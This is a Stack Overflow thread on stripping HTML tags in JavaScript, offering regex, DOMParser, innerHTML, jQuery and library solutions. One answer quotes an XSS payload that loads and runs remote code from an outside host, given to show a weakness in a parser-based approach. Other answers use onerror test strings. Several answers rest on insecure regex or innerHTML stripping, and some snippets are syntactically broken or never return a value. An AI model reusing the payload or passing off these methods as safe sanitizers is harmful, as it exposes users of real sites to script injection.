Bryan
Bryan

Reputation: 17581

Strip HTML tags from text using plain JavaScript

How to strip off HTML tags from a string using plain JavaScript only, not using a library?

Upvotes: 868

Views: 939863

Answers (30)

Karl.S
Karl.S

Reputation: 2402

This should do the work on any Javascript environment (NodeJS included).

    const text = `
    <html lang="en">
      <head>
        <style type="text/css">*{color:red}</style>
        <script>alert('hello')</script>
      </head>
      <body><b>This is some text</b><br/><body>
    </html>`;
    
    // Remove style tags and content
    text.replace(/<style[^>]*>.*<\/style>/g, '')
        // Remove script tags and content
        .replace(/<script[^>]*>.*<\/script>/g, '')
        // Remove all opening, closing and orphan HTML tags
        .replace(/<[^>]+>/g, '')
        // Remove leading spaces and repeated CR/LF
        .replace(/([\r\n]+ +)+/g, '');

Upvotes: 37

Samuel Eiche
Samuel Eiche

Reputation: 175

To add to the DOMParser solution. Our team found that it was still possible to inject malicious script using the basic solution.

\"><script>document.write('<img src=//X55.is onload=import(src)>');</script>'

\"><script>document.write('\"><script>document.write('\"><img src=//X55.is onload=import(src)>');</script>');</script>

We found that it was best to parse it recursively if any tags still exist after the initial parse.

function stripHTML(str) {
  const parsedHTML = new DOMParser().parseFromString(str, "text/html");
  const text = parsedHTML.body.textContent;

  if (/(<([^>]+)>)/gi.test(text)) {
    return stripHTML(text);
  }

  return text || "";
}

Upvotes: 3

Mariano Arga&#241;araz
Mariano Arga&#241;araz

Reputation: 1252

Additionally if you want to strip the html from a string and preserve the break lines, you can use this:

function stripHTML(string)(
  let doc = new DOMParser().parseFromString(string, 'text/html');
  let textLines = [];
  doc.body.childNodes.forEach((childNode) => {
    textLines.push(childNode.textContent || '');
  })
  let result = textLines.join('<br>');
  return result;
)

Upvotes: 0

Sabaz
Sabaz

Reputation: 5262

I would like to share an edited version of the Shog9's approved answer.


As Mike Samuel pointed with a comment, that function can execute inline javascript code.
But Shog9 is right when saying "let the browser do it for you..."

so.. here my edited version, using DOMParser:

function strip(html){
   let doc = new DOMParser().parseFromString(html, 'text/html');
   return doc.body.textContent || "";
}

here the code to test the inline javascript:

strip("<img onerror='alert(\"could run arbitrary JS here\")' src=bogus>")

Also, it does not request resources on parse (like images)

strip("Just text <img src='https://assets.rbl.ms/4155638/980x.jpg'>")

Upvotes: 321

AmerllicA
AmerllicA

Reputation: 32472

A very good library would be sanitize-html which is a pure JavaScript function and it could help in any environment.

My case was on React Native I needed to remove all HTML tags from the given texts. so I created this wrapper function:

import sanitizer from 'sanitize-html';

const textSanitizer = (textWithHTML: string): string =>
  sanitizer(textWithHTML, {
    allowedTags: [],
  });

export default textSanitizer;

Now by using my textSanitizer, I can have got the pure text contents.

Upvotes: 4

Mahesh
Mahesh

Reputation: 113

You can strip out all the html tags with the following regex: /<(.|\n)*?>/g

Example:

let str = "<font class=\"ClsName\">int[0]</font><font class=\"StrLit\">()</font>";
console.log(str.replace(/<(.|\n)*?>/g, ''));

Output:

int[0]()

Upvotes: 0

Ankit Kumawat
Ankit Kumawat

Reputation: 441

const htmlParser= new DOMParser().parseFromString("<h6>User<p>name</p></h6>" , 'text/html');
const textString= htmlParser.body.textContent;
console.log(textString)

Upvotes: 9

Yilmaz
Yilmaz

Reputation: 49182

const strip=(text) =>{
    return (new DOMParser()?.parseFromString(text,"text/html"))
    ?.body?.textContent
}

const value=document.getElementById("idOfEl").value

const cleanText=strip(value)

Upvotes: 2

Kody
Kody

Reputation: 965

As others suggested, I recommend using DOMParser when possible.

However, if you happen to be working inside a Node/JS Lambda or otherwise DOMParser is not available, I came up with the regex below to match most of the scenarios mentioned in previous answers/comments. It doesn't match $gt; and $lt; as some others may have a concern about, but should capture pretty much any other scenario.

const dangerousText = '?';
const htmlTagRegex = /<\/?([a-zA-Z]\s?)*?([a-zA-Z]+?=\s?".*")*?([\s/]*?)>/gi;
const sanitizedText = dangerousText.replace(htmlTagRegex, '');

This might be easy to simplify, but it should work for most situations. Hope it helps someone.

Upvotes: 1

fadi omar
fadi omar

Reputation: 768

const getTextFromHtml = (t) =>
  t
    ?.split('>')
    ?.map((i) => i.split('<')[0])
    .filter((i) => !i.includes('=') && i.trim())
    .join('');

const test = '<p>This <strong>one</strong> <em>time</em>,</p><br /><blockquote>I went to</blockquote><ul><li>band <a href="https://workingclasshistory.com" rel="noopener noreferrer" target="_blank">camp</a>…</li></ul><p>I edited this as a reviewer just to double check</p>'

getTextFromHtml(test)
  // 'This onetime,I went toband camp…I edited this as a reviewer just to double check'

Upvotes: 1

Johannes Fahrenkrug
Johannes Fahrenkrug

Reputation: 44700

It is also possible to use the fantastic htmlparser2 pure JS HTML parser. Here is a working demo:

var htmlparser = require('htmlparser2');

var body = '<p><div>This is </div>a <span>simple </span> <img src="test"></img>example.</p>';

var result = [];

var parser = new htmlparser.Parser({
    ontext: function(text){
        result.push(text);
    }
}, {decodeEntities: true});

parser.write(body);
parser.end();

result.join('');

The output will be This is a simple example.

See it in action here: https://tonicdev.com/jfahrenkrug/extract-text-from-html

This works in both node and the browser if you pack your web application using a tool like webpack.

Upvotes: 6

Johnny Oshika
Johnny Oshika

Reputation: 57482

This package works really well for stripping HTML: https://www.npmjs.com/package/string-strip-html

It works in both the browser and on the server (e.g. Node.js).

Upvotes: 0

jnaklaas
jnaklaas

Reputation: 1769

If you don't want to create a DOM for this (perhaps you're not in a browser context) you could use the striptags npm package.

import striptags from 'striptags'; //ES6 <-- pick one
const striptags = require('striptags'); //ES5 <-- pick one

striptags('<p>An HTML string</p>');

Upvotes: 2

Saurabh Dixit
Saurabh Dixit

Reputation: 11

var STR='<Your HTML STRING>''
var HTMLParsedText="";
   var resultSet =  STR.split('>')
   var resultSetLength =resultSet.length
   var counter=0
   while(resultSetLength>0)
   {
      if(resultSet[counter].indexOf('<')>0)
      {    
        var value = resultSet[counter];
        value=value.substring(0, resultSet[counter].indexOf('<'))
        if (resultSet[counter].indexOf('&')>=0 && resultSet[counter].indexOf(';')>=0) {
            value=value.replace(value.substring(resultSet[counter].indexOf('&'), resultSet[counter].indexOf(';')+1),'')
        }
      }
        if (value)
        {
          value = value.trim();
          if(HTMLParsedText === "")
          {
              HTMLParsedText = value;
          }
          else
          {
            if (value) {
              HTMLParsedText = HTMLParsedText + "\n" + value;
            }
          }
          value='';
        }
        counter= counter+1;
      resultSetLength=resultSetLength-1;
   }
  console.log(HTMLParsedText);

Upvotes: 0

Anatol Zakrividoroga
Anatol Zakrividoroga

Reputation: 4518

from CSS tricks:

https://css-tricks.com/snippets/javascript/strip-html-tags-in-javascript/

const originalString = `
  <div>
    <p>Hey that's <span>somthing</span></p>
  </div>
`;

const strippedString = originalString.replace(/(<([^>]+)>)/gi, "");

console.log(strippedString);

Upvotes: 16

user999305
user999305

Reputation: 1013

As an extension to the jQuery method, if your string might not contain HTML (eg if you are trying to remove HTML from a form field)

jQuery(html).text();

will return an empty string if there is no HTML

Use:

jQuery('<p>' + html + '</p>').text();

instead.

Update: As has been pointed out in the comments, in some circumstances this solution will execute javascript contained within html if the value of html could be influenced by an attacker, use a different solution.

Upvotes: 61

Shog9
Shog9

Reputation: 159590

If you're running in a browser, then the easiest way is just to let the browser do it for you...

function stripHtml(html)
{
   let tmp = document.createElement("DIV");
   tmp.innerHTML = html;
   return tmp.textContent || tmp.innerText || "";
}

Note: as folks have noted in the comments, this is best avoided if you don't control the source of the HTML (for example, don't run this on anything that could've come from user input). For those scenarios, you can still let the browser do the work for you - see Saba's answer on using the now widely-available DOMParser.

Upvotes: 916

AkshayBandivadekar
AkshayBandivadekar

Reputation: 840

For easier solution, try this => https://css-tricks.com/snippets/javascript/strip-html-tags-in-javascript/

var StrippedString = OriginalString.replace(/(<([^>]+)>)/ig,"");

Upvotes: 6

SwiftNinjaPro
SwiftNinjaPro

Reputation: 853

method 1:

function cleanHTML(str){
  str.replace(/<(?<=<)(.*?)(?=>)>/g, '&lt;$1&gt;');
}

function uncleanHTML(str){
  str.replace(/&lt;(?<=&lt;)(.*?)(?=&gt;)&gt;/g, '<$1>');
}

method 2:

function cleanHTML(str){
  str.replace(/</g, '&lt;').replace(/>/g, '&gt;');
}

function uncleanHTML(str){
  str.replace(/&lt;/g, '<').replace(/&gt;/g, '>');
}

also, don't forget if the user happens to post a math comment (ex: 1 < 2), you don't want to strip the whole comment. The browser (only tested chrome) doesn't run unicode as html tags. if you replace all < with &lt; everyware in the string, the unicode will display < as text without running any html. I recommend method 2. jquery also works well $('#element').text();

Upvotes: 0

nickf
nickf

Reputation: 545975

myString.replace(/<[^>]*>?/gm, '');

Upvotes: 805

nickl-
nickl-

Reputation: 8721

A safer way to strip the html with jQuery is to first use jQuery.parseHTML to create a DOM, ignoring any scripts, before letting jQuery build an element and then retrieving only the text.

function stripHtml(unsafe) {
    return $($.parseHTML(unsafe)).text();
}

Can safely strip html from:

<img src="unknown.gif" onerror="console.log('running injections');">

And other exploits.

nJoy!

Upvotes: 2

sonichy
sonichy

Reputation: 1478

https://developer.mozilla.org/en-US/docs/Web/API/Element/insertAdjacentHTML

var div = document.getElementsByTagName('div');
for (var i=0; i<div.length; i++) {
    div[i].insertAdjacentHTML('afterend', div[i].innerHTML);
    document.body.removeChild(div[i]);
}

Upvotes: 0

Janghou
Janghou

Reputation: 1843

An improvement to the accepted answer.

function strip(html)
{
   var tmp = document.implementation.createHTMLDocument("New").body;
   tmp.innerHTML = html;
   return tmp.textContent || tmp.innerText || "";
}

This way something running like this will do no harm:

strip("<img onerror='alert(\"could run arbitrary JS here\")' src=bogus>")

Firefox, Chromium and Explorer 9+ are safe. Opera Presto is still vulnerable. Also images mentioned in the strings are not downloaded in Chromium and Firefox saving http requests.

Upvotes: 37

hegemon
hegemon

Reputation: 6764

var text = html.replace(/<\/?("[^"]*"|'[^']*'|[^>])*(>|$)/g, "");

This is a regex version, which is more resilient to malformed HTML, like:

Unclosed tags

Some text <img

"<", ">" inside tag attributes

Some text <img alt="x > y">

Newlines

Some <a href="http://google.com">

The code

var html = '<br>This <img alt="a>b" \r\n src="a_b.gif" />is > \nmy<>< > <a>"text"</a'
var text = html.replace(/<\/?("[^"]*"|'[^']*'|[^>])*(>|$)/g, "");

Upvotes: 22

function strip_html_tags(str)
{
   if ((str===null) || (str===''))
       return false;
  else
   str = str.toString();
  return str.replace(/<[^>]*>/g, '');
}

Upvotes: -1

Mike Datsko
Mike Datsko

Reputation: 170

input element support only one line text:

The text state represents a one line plain text edit control for the element's value.

function stripHtml(str) {
  var tmp = document.createElement('input');
  tmp.value = str;
  return tmp.value;
}

Update: this works as expected

function stripHtml(str) {
  // Remove some tags
  str = str.replace(/<[^>]+>/gim, '');

  // Remove BB code
  str = str.replace(/\[(\w+)[^\]]*](.*?)\[\/\1]/g, '$2 ');

  // Remove html and line breaks
  const div = document.createElement('div');
  div.innerHTML = str;

  const input = document.createElement('input');
  input.value = div.textContent || div.innerText || '';

  return input.value;
}

Upvotes: 1

Harry Stevens
Harry Stevens

Reputation: 1423

A lot of people have answered this already, but I thought it might be useful to share the function I wrote that strips HTML tags from a string but allows you to include an array of tags that you do not want stripped. It's pretty short and has been working nicely for me.

function removeTags(string, array){
  return array ? string.split("<").filter(function(val){ return f(array, val); }).map(function(val){ return f(array, val); }).join("") : string.split("<").map(function(d){ return d.split(">").pop(); }).join("");
  function f(array, value){
    return array.map(function(d){ return value.includes(d + ">"); }).indexOf(true) != -1 ? "<" + value : value.split(">")[1];
  }
}

var x = "<span><i>Hello</i> <b>world</b>!</span>";
console.log(removeTags(x)); // Hello world!
console.log(removeTags(x, ["span", "i"])); // <span><i>Hello</i> world!</span>

Upvotes: 5

Mathieu Paturel
Mathieu Paturel

Reputation: 4500

Using Jquery:

function stripTags() {
    return $('<p></p>').html(textToEscape).text()
}

Upvotes: 1

Abhishek Dhanraj Shahdeo
Abhishek Dhanraj Shahdeo

Reputation: 1356

For escape characters also this will work using pattern matching:

myString.replace(/((&lt)|(<)(?:.|\n)*?(&gt)|(>))/gm, '');

Upvotes: 0

gyula.nemeth
gyula.nemeth

Reputation: 867

If you want to keep the links and the structure of the content (h1, h2, etc) then you should check out TextVersionJS You can use it with any HTML, although it was created to convert an HTML email to plain text.

The usage is very simple. For example in node.js:

var createTextVersion = require("textversionjs");
var yourHtml = "<h1>Your HTML</h1><ul><li>goes</li><li>here.</li></ul>";

var textVersion = createTextVersion(yourHtml);

Or in the browser with pure js:

<script src="textversion.js"></script>
<script>
  var yourHtml = "<h1>Your HTML</h1><ul><li>goes</li><li>here.</li></ul>";
  var textVersion = createTextVersion(yourHtml);
</script>

It also works with require.js:

define(["textversionjs"], function(createTextVersion) {
  var yourHtml = "<h1>Your HTML</h1><ul><li>goes</li><li>here.</li></ul>";
  var textVersion = createTextVersion(yourHtml);
});

Upvotes: 7

Related Questions